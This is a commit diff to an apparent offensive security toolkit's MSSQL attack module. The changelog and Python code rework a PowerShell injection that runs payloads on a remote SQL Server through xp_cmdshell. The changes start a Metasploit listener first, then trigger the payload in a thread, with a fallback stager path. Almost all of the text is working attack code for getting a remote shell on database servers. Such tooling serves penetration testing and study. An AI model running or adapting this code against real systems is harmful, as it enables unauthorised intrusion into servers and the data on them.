Major updates to mssql attack powershell injection

readme/CHANGES

@@ -3,6 +3,11 @@ version 6.0.1
 ~~~~~~~~~~~~~~~~
 
 * fixed menu system to remove sms spoofing (no longer supported)
+* redesigned powershell injection to be much more efficient 
+* removed time delays in powershell injection, instead use pexpect expect() to wait for listener to start
+* added option to fall back to old method if powershell injection fails (option menu)
+* start msf listener first, wait for msf to launch, then trigger vulnerability
+* threaded the powershell injection command through mssql
 
 ~~~~~~~~~~~~~~~~
 version 6.0

src/fasttrack/mssql.py

@@ -103,8 +103,12 @@ def deploy_hex2binary(ipaddr,port,username,password):
     match = re.search("parameter version", bundle)
     # if we have a match we have powershell installed
     if match:
-        print_status("Powershell was identified, targeting server through powershell injection.")
+        print_status("Powershell was detected on the remote system.")
+        option_ps = raw_input("Do you want to use powershell injection? [yes/no]:")
+        if option_ps == "" or option_ps == "y" or option_ps == "yes":
             option = "1"
+            print_status("Powershell delivery selected. Boom!")
+        else: option = "2"
     # otherwise, fall back to the older version using debug conversion via hex
     else:
         print_status("Powershell not detected, attempting Windows debug method.")
@@ -199,6 +203,9 @@ def deploy_hex2binary(ipaddr,port,username,password):
                 except: import pexpect
                 print_status("Starting the Metasploit listener...")
                 child2 = pexpect.spawn("%s/msfconsole -r %s/reports/powershell/powershell.rc" % (msf_path,setdir))
+                print_status("Waiting for the listener to start first before we continue forward...")
+                print_status("Be patient, Metaploit takes a little bit to start...")
+                child2.expect("Starting the payload handler", timeout=30000)
 
         # assign random_exe command to the powershell command
         random_exe = powershell_command
@@ -265,25 +272,23 @@ def deploy_hex2binary(ipaddr,port,username,password):
     # thread is needed here due to the connect not always terminating thread, it hangs if thread isnt specified
     try: reload(thread)
     except: import thread
+
     # execute the payload
     # we append more commands if option 1 is used
-
     if option == "1":
-        print_status("Trigger the powershell injection payload.. ")
+            print_status("Triggering the powershell injection payload... ")
-        mssql.sql_query("exec master..xp_cmdshell '%s'" % (powershell_command))
+            sql_command = ("exec master..xp_cmdshell '%s'" % (powershell_command))            
+            #mssql.sql_query("exec master..xp_cmdshell '%s'" % (powershell_command))
+            thread.start_new_thread(mssql.sql_query, (sql_command,))
 
+    # using the old method
     if option == "2":
+        print_status("Triggering payload stager...")
         sql_command = ("xp_cmdshell '%s'" % (random_exe))
         # start thread of SQL command that executes payload
         thread.start_new_thread(mssql.sql_query, (sql_command,))
         time.sleep(1)
 
-    # pause to let metasploit launch - real slow systems may need to adjust
-    # i need to rewrite this to do a child.expect on msf and wait until that happens
-    print_status("Pausing 15 seconds to let the system catch up...")
-    time.sleep(15)
-    print_status("Triggering payload stager...")
-
     # if pexpect doesnt exit right then it freaks out
     if os.path.isfile(setdir + "/set.payload"):
         os.system("python ../../payloads/set_payloads/listener.py")